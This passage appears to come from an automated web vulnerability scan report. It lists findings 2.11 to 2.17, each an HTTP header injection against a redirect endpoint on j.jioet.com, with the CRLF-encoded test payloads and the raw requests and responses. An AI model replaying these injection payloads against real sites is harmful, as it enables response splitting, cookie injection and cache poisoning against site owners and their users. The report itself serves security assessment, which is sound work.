Set-Cookie: QPC201004061902210=ZZa20114257Zc203585399%2C203585399Zg172Zw56Zm0Zs6598Zk533110218044849667ZrNULLZiNULLZt149ZZ; path=/; EXPIRES=Sun, 20-Mar-11 12:48:49 GMT; DOMAIN=.jioet.com
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Location: http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=7e042
e45d4f30234
&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=533110218044849667&&exp=y
Content-Type: text/html; charset=iso-8859-1
Content-Length: 1134

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://forms.vendorseek.com/controller?srvid=67110
...[SNIP]...

2.11. http://j.jioet.com/cgi/r [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://j.jioet.com
Path:   /cgi/r

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload a2fcc%0d%0a89eed5f8dfa was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /cgi/r?;n=203;c=585399;s=6598;x=7936;f=201004061902210;u=j;z=TIMESTAMP;k=http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http%3A%2F%2Fwww%2Evendorseek%2Ecom%2Fwebsite%5Fdesign%5Fand%5Fecommerce%2Easp%3F%26CCID%3D20099791203555503%26QTR%3DZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ%26CLK%3D166110218044716818%26%26CCID%3D20123519203630910%26QTR%3DZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910%2C203630910Zs9544ZZ%26CLK%3D394110218044719808%26%26exp%3Dy%26%26exp%3Dy&InternalReferralURL=&hidepriv=true&&a2fcc%0d%0a89eed5f8dfa=1 HTTP/1.1
Host: j.jioet.com
Proxy-Connection: keep-alive
Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Fri, 18 Feb 2011 12:48:53 GMT
Server: QUAD 3G
Set-Cookie: QIDA=TV5qtQqABU0AAFuQIrw; domain=.jioet.com; path=/; expires=Mon, 15-Feb-21 12:48:53 GMT
Connection: close
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Set-Cookie: qsg=14508; path=/; EXPIRES=Mon, 13-Feb-12 12:48:53 GMT; DOMAIN=.jioet.com
Set-Cookie: QPC201004061902210=ZZa20114257Zc203585399%2C203585399Zg172Zw56Zm0Zs6598Zk144110218044853860ZrNULLZiNULLZt149ZZ; path=/; EXPIRES=Sun, 20-Mar-11 12:48:53 GMT; DOMAIN=.jioet.com
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Location: http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&a2fcc
89eed5f8dfa
=1&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=144110218044853860&&exp=y
Content-Type: text/html; charset=iso-8859-1
Content-Length: 1145

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://forms.vendorseek.com/controller?srvid=67110
...[SNIP]...

2.12. http://j.jioet.com/cgi/r [qset parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://j.jioet.com
Path:   /cgi/r

Issue detail

The value of the qset request parameter is copied into the Location response header. The payload 165e5%0d%0ac319200ce11 was submitted in the qset parameter. This caused a response containing an injected HTTP header.

Request

GET /cgi/r?;n=203;c=585399;s=6598;x=7936;f=201004061902210;u=j;z=TIMESTAMP;k=http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=165e5%0d%0ac319200ce11&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http%3A%2F%2Fwww%2Evendorseek%2Ecom%2Fwebsite%5Fdesign%5Fand%5Fecommerce%2Easp%3F%26CCID%3D20099791203555503%26QTR%3DZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ%26CLK%3D166110218044716818%26%26CCID%3D20123519203630910%26QTR%3DZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910%2C203630910Zs9544ZZ%26CLK%3D394110218044719808%26%26exp%3Dy%26%26exp%3Dy&InternalReferralURL=&hidepriv=true& HTTP/1.1
Host: j.jioet.com
Proxy-Connection: keep-alive
Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Fri, 18 Feb 2011 12:48:23 GMT
Server: QUAD 3G
Set-Cookie: QIDA=TV5qlwqABU0AAEag7Fk; domain=.jioet.com; path=/; expires=Mon, 15-Feb-21 12:48:23 GMT
Connection: close
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Set-Cookie: qsg=14508; path=/; EXPIRES=Mon, 13-Feb-12 12:48:23 GMT; DOMAIN=.jioet.com
Set-Cookie: QPC201004061902210=ZZa20114257Zc203585399%2C203585399Zg172Zw56Zm0Zs6598Zk226110218044823403ZrNULLZiNULLZt149ZZ; path=/; EXPIRES=Sun, 20-Mar-11 12:48:23 GMT; DOMAIN=.jioet.com
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Location: http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=165e5
c319200ce11
&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=226110218044823403&&exp=y
Content-Type: text/html; charset=iso-8859-1
Content-Length: 1128

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://forms.vendorseek.com/controller?srvid=67110
...[SNIP]...

2.13. http://j.jioet.com/cgi/r [sdw parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://j.jioet.com
Path:   /cgi/r

Issue detail

The value of the sdw request parameter is copied into the Location response header. The payload a6faf%0d%0ad11408052f1 was submitted in the sdw parameter. This caused a response containing an injected HTTP header.

Request

GET /cgi/r?;n=203;c=585399;s=6598;x=7936;f=201004061902210;u=j;z=TIMESTAMP;k=http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=a6faf%0d%0ad11408052f1&sp=true&LeadSiteURL=http%3A%2F%2Fwww%2Evendorseek%2Ecom%2Fwebsite%5Fdesign%5Fand%5Fecommerce%2Easp%3F%26CCID%3D20099791203555503%26QTR%3DZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ%26CLK%3D166110218044716818%26%26CCID%3D20123519203630910%26QTR%3DZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910%2C203630910Zs9544ZZ%26CLK%3D394110218044719808%26%26exp%3Dy%26%26exp%3Dy&InternalReferralURL=&hidepriv=true& HTTP/1.1
Host: j.jioet.com
Proxy-Connection: keep-alive
Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Fri, 18 Feb 2011 12:48:32 GMT
Server: QUAD 3G
Set-Cookie: QIDA=TV5qoAqABU0AAATqg@Y; domain=.jioet.com; path=/; expires=Mon, 15-Feb-21 12:48:32 GMT
Connection: close
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Set-Cookie: qsg=14508; path=/; EXPIRES=Mon, 13-Feb-12 12:48:32 GMT; DOMAIN=.jioet.com
Set-Cookie: QPC201004061902210=ZZa20114257Zc203585399%2C203585399Zg172Zw56Zm0Zs6598Zk682110218044832619ZrNULLZiNULLZt149ZZ; path=/; EXPIRES=Sun, 20-Mar-11 12:48:32 GMT; DOMAIN=.jioet.com
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Location: http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=a6faf
d11408052f1
&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=682110218044832619&&exp=y
Content-Type: text/html; charset=iso-8859-1
Content-Length: 1124

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://forms.vendorseek.com/controller?srvid=67110
...[SNIP]...

2.14. http://j.jioet.com/cgi/r [segid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://j.jioet.com
Path:   /cgi/r

Issue detail

The value of the segid request parameter is copied into the Location response header. The payload 7302f%0d%0a96d19307f57 was submitted in the segid parameter. This caused a response containing an injected HTTP header.

Request

GET /cgi/r?;n=203;c=585399;s=6598;x=7936;f=201004061902210;u=j;z=TIMESTAMP;k=http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=7302f%0d%0a96d19307f57&sdw=vendorseek.com&sp=true&LeadSiteURL=http%3A%2F%2Fwww%2Evendorseek%2Ecom%2Fwebsite%5Fdesign%5Fand%5Fecommerce%2Easp%3F%26CCID%3D20099791203555503%26QTR%3DZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ%26CLK%3D166110218044716818%26%26CCID%3D20123519203630910%26QTR%3DZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910%2C203630910Zs9544ZZ%26CLK%3D394110218044719808%26%26exp%3Dy%26%26exp%3Dy&InternalReferralURL=&hidepriv=true& HTTP/1.1
Host: j.jioet.com
Proxy-Connection: keep-alive
Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Fri, 18 Feb 2011 12:48:29 GMT
Server: QUAD 3G
Set-Cookie: QIDA=TV5qnQqABU0AAARjeww; domain=.jioet.com; path=/; expires=Mon, 15-Feb-21 12:48:29 GMT
Connection: close
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Set-Cookie: qsg=14508; path=/; EXPIRES=Mon, 13-Feb-12 12:48:29 GMT; DOMAIN=.jioet.com
Set-Cookie: QPC201004061902210=ZZa20114257Zc203585399%2C203585399Zg172Zw56Zm0Zs6598Zk122110218044829024ZrNULLZiNULLZt149ZZ; path=/; EXPIRES=Sun, 20-Mar-11 12:48:29 GMT; DOMAIN=.jioet.com
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Location: http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=7302f
96d19307f57
&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=122110218044829024&&exp=y
Content-Type: text/html; charset=iso-8859-1
Content-Length: 1138

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://forms.vendorseek.com/controller?srvid=67110
...[SNIP]...

2.15. http://j.jioet.com/cgi/r [sp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://j.jioet.com
Path:   /cgi/r

Issue detail

The value of the sp request parameter is copied into the Location response header. The payload c97c6%0d%0af89b2e971c3 was submitted in the sp parameter. This caused a response containing an injected HTTP header.

Request

GET /cgi/r?;n=203;c=585399;s=6598;x=7936;f=201004061902210;u=j;z=TIMESTAMP;k=http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=c97c6%0d%0af89b2e971c3&LeadSiteURL=http%3A%2F%2Fwww%2Evendorseek%2Ecom%2Fwebsite%5Fdesign%5Fand%5Fecommerce%2Easp%3F%26CCID%3D20099791203555503%26QTR%3DZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ%26CLK%3D166110218044716818%26%26CCID%3D20123519203630910%26QTR%3DZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910%2C203630910Zs9544ZZ%26CLK%3D394110218044719808%26%26exp%3Dy%26%26exp%3Dy&InternalReferralURL=&hidepriv=true& HTTP/1.1
Host: j.jioet.com
Proxy-Connection: keep-alive
Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Fri, 18 Feb 2011 12:48:37 GMT
Server: QUAD 3G
Set-Cookie: QIDA=TV5qpQqABU0AAFtCp4E; domain=.jioet.com; path=/; expires=Mon, 15-Feb-21 12:48:37 GMT
Connection: close
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Set-Cookie: qsg=14508; path=/; EXPIRES=Mon, 13-Feb-12 12:48:37 GMT; DOMAIN=.jioet.com
Set-Cookie: QPC201004061902210=ZZa20114257Zc203585399%2C203585399Zg172Zw56Zm0Zs6598Zk734110218044837517ZrNULLZiNULLZt149ZZ; path=/; EXPIRES=Sun, 20-Mar-11 12:48:37 GMT; DOMAIN=.jioet.com
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Location: http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=c97c6
f89b2e971c3
&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=734110218044837517&&exp=y
Content-Type: text/html; charset=iso-8859-1
Content-Length: 1134

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://forms.vendorseek.com/controller?srvid=67110
...[SNIP]...

2.16. http://j.jioet.com/cgi/r [spage parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://j.jioet.com
Path:   /cgi/r

Issue detail

The value of the spage request parameter is copied into the Location response header. The payload ac9b5%0d%0a7aa82c9df45 was submitted in the spage parameter. This caused a response containing an injected HTTP header.

Request

GET /cgi/r?;n=203;c=585399;s=6598;x=7936;f=201004061902210;u=j;z=TIMESTAMP;k=http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=ac9b5%0d%0a7aa82c9df45&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http%3A%2F%2Fwww%2Evendorseek%2Ecom%2Fwebsite%5Fdesign%5Fand%5Fecommerce%2Easp%3F%26CCID%3D20099791203555503%26QTR%3DZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ%26CLK%3D166110218044716818%26%26CCID%3D20123519203630910%26QTR%3DZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910%2C203630910Zs9544ZZ%26CLK%3D394110218044719808%26%26exp%3Dy%26%26exp%3Dy&InternalReferralURL=&hidepriv=true& HTTP/1.1
Host: j.jioet.com
Proxy-Connection: keep-alive
Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Fri, 18 Feb 2011 12:48:14 GMT
Server: QUAD 3G
Set-Cookie: QIDA=TV5qjgqABU0AAASGvC4; domain=.jioet.com; path=/; expires=Mon, 15-Feb-21 12:48:14 GMT
Connection: close
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Set-Cookie: qsg=14508; path=/; EXPIRES=Mon, 13-Feb-12 12:48:14 GMT; DOMAIN=.jioet.com
Set-Cookie: QPC201004061902210=ZZa20114257Zc203585399%2C203585399Zg172Zw56Zm0Zs6598Zk902110218044814004ZrNULLZiNULLZt149ZZ; path=/; EXPIRES=Sun, 20-Mar-11 12:48:14 GMT; DOMAIN=.jioet.com
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Location: http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=ac9b5
7aa82c9df45
&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=902110218044814004&&exp=y
Content-Type: text/html; charset=iso-8859-1
Content-Length: 1138

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://forms.vendorseek.com/controller?srvid=67110
...[SNIP]...

2.17. http://j.jioet.com/cgi/r [tnum parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://j.jioet.com
Path:   /cgi/r

Issue detail

The value of the tnum request parameter is copied into the Location response header. The payload 87307%0d%0a1ff0f4663d8 was submitted in the tnum parameter. This caused a response containing an injected HTTP header.

Request

GET /cgi/r?;n=203;c=585399;s=6598;x=7936;f=201004061902210;u=j;z=TIMESTAMP;k=http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=87307%0d%0a1ff0f4663d8&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http%3A%2F%2Fwww%2Evendorseek%2Ecom%2Fwebsite%5Fdesign%5Fand%5Fecommerce%2Easp%3F%26CCID%3D20099791203555503%26QTR%3DZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ%26CLK%3D166110218044716818%26%26CCID%3D20123519203630910%26QTR%3DZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910%2C203630910Zs9544ZZ%26CLK%3D394110218044719808%26%26exp%3Dy%26%26exp%3Dy&InternalReferralURL=&hidepriv=true& HTTP/1.1
Host: j.jioet.com
Proxy-Connection: keep-alive
Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Fri, 18 Feb 2011 12:47:41 GMT
Server: QUAD 3G
Set-Cookie: QIDA=TV5qbQqABU0AAHAbVFY; domain=.jioet.com; path=/; expires=Mon, 15-Feb-21 12:47:41 GMT
Connection: close
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
